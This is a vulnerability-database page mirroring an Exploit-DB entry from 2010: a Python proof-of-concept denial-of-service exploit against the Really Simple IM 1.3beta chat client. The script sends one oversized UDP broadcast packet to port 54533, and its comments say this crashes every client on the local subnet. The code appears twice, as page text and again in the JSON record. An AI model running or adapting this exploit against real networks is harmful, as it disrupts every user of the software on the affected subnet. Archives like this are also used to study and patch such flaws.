Search...

Really Simple IM 1.3beta DoS Proof of Concept

2010-07-18T00:00:00

ID EDB-ID:14408
Type exploitdb
Reporter loneferret
Modified 2010-07-18T00:00:00

Description

Really Simple IM 1.3beta DoS Proof of Concept. Dos exploit for windows platform

                                        
                                            #!/usr/bin/python

import socket
import sys

# Bug found: 18th July 2010
# DoS proof of concept
# Found  by: loneferret
# Tested on Windows XP Professional SP2-SP3 & Windows XP Home SP3 

# Really Simple IM verion 1.3 beta
# Software: http://code.google.com/p/reallysimpleim/
# Nods to exploit-db
# I don't want this on injector &lt;- notice the no leet talk.

# This little application uses UDP to & send receive messages.
# It broadcasts everything, and picks up everything
# on port 54533.
# The funny thing with this PoC, it will crash all clients
# in the same subnet. Yup it's that funny. That's the only thing it does too...
# No EIP, no SEH but the buffer is still in memory at the
# moment of the crash. Figured I'd share anyway.


#Commands
# 'p' Connect and adds users to list
# 'a' Disconnect message
# 'b' Send message
# 't' Direct message

host = '192.168.xxx.255'  #Adjust broadcast address to your network
port = 54533

buffer



try:
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
   s.bind((host,0))
   s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
except:
   print "socket() failed"
   sys.exit(1)

da = "p"
da += "W00T" + ("\x41" * 10000)
s.sendto(da, (host, port))

JSON Vulners Source

Initial Source

{"id": "EDB-ID:14408", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Really Simple IM 1.3beta DoS Proof of Concept", "description": "Really Simple IM 1.3beta DoS Proof of Concept. Dos exploit for windows platform", "published": "2010-07-18T00:00:00", "modified": "2010-07-18T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/14408/", "reporter": "loneferret", "references": [], "cvelist": [], "lastseen": "2016-02-01T19:48:15", "viewCount": 4, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-02-01T19:48:15", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-01T19:48:15", "rev": 2}, "vulnersScore": -0.4}, "sourceHref": "https://www.exploit-db.com/download/14408/", "sourceData": "#!/usr/bin/python\r\n\r\nimport socket\r\nimport sys\r\n\r\n# Bug found: 18th July 2010\r\n# DoS proof of concept\r\n# Found by: loneferret\r\n# Tested on Windows XP Professional SP2-SP3 & Windows XP Home SP3 \r\n\r\n# Really Simple IM verion 1.3 beta\r\n# Software: http://code.google.com/p/reallysimpleim/\r\n# Nods to exploit-db\r\n# I don't want this on injector <- notice the no leet talk.\r\n\r\n# This little application uses UDP to & send receive messages.\r\n# It broadcasts everything, and picks up everything\r\n# on port 54533.\r\n# The funny thing with this PoC, it will crash all clients\r\n# in the same subnet. Yup it's that funny. That's the only thing it does too...\r\n# No EIP, no SEH but the buffer is still in memory at the\r\n# moment of the crash. Figured I'd share anyway.\r\n\r\n\r\n#Commands\r\n# 'p' Connect and adds users to list\r\n# 'a' Disconnect message\r\n# 'b' Send message\r\n# 't' Direct message\r\n\r\nhost = '192.168.xxx.255' #Adjust broadcast address to your network\r\nport = 54533\r\n\r\nbuffer\r\n\r\n\r\n\r\ntry:\r\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n s.bind((host,0))\r\n s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\r\nexcept:\r\n print \"socket() failed\"\r\n sys.exit(1)\r\n\r\nda = \"p\"\r\nda += \"W00T\" + (\"\\x41\" * 10000)\r\ns.sendto(da, (host, port))\r\n", "osvdbidlist": ["66447"]}